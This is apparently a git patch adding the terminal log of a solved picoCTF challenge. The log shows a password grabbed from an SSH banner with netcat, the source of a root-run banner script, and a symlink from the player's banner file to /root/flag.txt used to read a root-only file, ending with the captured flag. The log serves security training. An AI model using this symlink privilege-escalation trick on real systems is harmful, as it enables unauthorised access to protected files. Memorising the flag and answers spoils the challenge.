From a1ccace3f8ebe86893282876ab463b0ce6b7fb9a Mon Sep 17 00:00:00 2001 From: h7x4 Date: Tue, 3 Sep 2024 17:47:47 +0200 Subject: [PATCH] misc/dont_you_love_banners --- misc/dont_you_love_banners/output.txt | 90 +++++++++++++++++++++++++++ 1 file changed, 90 insertions(+) create mode 100644 misc/dont_you_love_banners/output.txt diff --git a/misc/dont_you_love_banners/output.txt b/misc/dont_you_love_banners/output.txt new file mode 100644 index 0000000..be230fd --- /dev/null +++ b/misc/dont_you_love_banners/output.txt @@ -0,0 +1,90 @@ +$ nc tethys.picoctf.net 57752 +************************************* +**************WELCOME**************** +************************************* + +what is the password? + +^C +$ nc tethys.picoctf.net 55046 +SSH-2.0-OpenSSH_7.6p1 My_Passw@rd_@1234 + +Protocol mismatch. + +$ nc tethys.picoctf.net 57752 +************************************* +**************WELCOME**************** +************************************* + +what is the password? +My_Passw@rd_@1234 +What is the top cyber security conference in the world? +DEFCON +the first hacker ever was known for phreaking(making free phone calls), who was it? +John Draper +player@challenge:~$ ls /root +ls /root +flag.txt script.py +player@challenge:~$ cat /root/flag.txt +cat /root/flag.txt +cat: /root/flag.txt: Permission denied +player@challenge:~$ cat /root/script.py +cat /root/script.py + +import os +import pty + +incorrect_ans_reply = "Lol, good try, try again and good luck\n" + +if __name__ == "__main__": + try: + with open("/home/player/banner", "r") as f: + print(f.read()) + except: + print("*********************************************") + print("***************DEFAULT BANNER****************") + print("*Please supply banner in /home/player/banner*") + print("*********************************************") + +try: + request = input("what is the password? \n").upper() + while request: + if request == 'MY_PASSW@RD_@1234': + text = input("What is the top cyber security conference in the world?\n").upper() + if text == 'DEFCON' or text == 'DEF CON': + output = input( + "the first hacker ever was known for phreaking(making free phone calls), who was it?\n").upper() + if output == 'JOHN DRAPER' or output == 'JOHN THOMAS DRAPER' or output == 'JOHN' or output== 'DRAPER': + scmd = 'su - player' + pty.spawn(scmd.split(' ')) + + else: + print(incorrect_ans_reply) + else: + print(incorrect_ans_reply) + else: + print(incorrect_ans_reply) + break + +except: + KeyboardInterrupt + +player@challenge:~$ ln -s /root/flag.txt banner +ln -s /root/flag.txt banner +ln: failed to create symbolic link 'banner': File exists +player@challenge:~$ cat banner +cat banner +************************************* +**************WELCOME**************** +************************************* +player@challenge:~$ rm banner +rm banner +player@challenge:~$ ln -s /root/flag.txt banner +ln -s /root/flag.txt banner +player@challenge:~$ exit +exit +logout +$ nc tethys.picoctf.net 57752 +picoCTF{b4nn3r_gr4bb1n9_su((3sfu11y_f7608541} + +what is the password?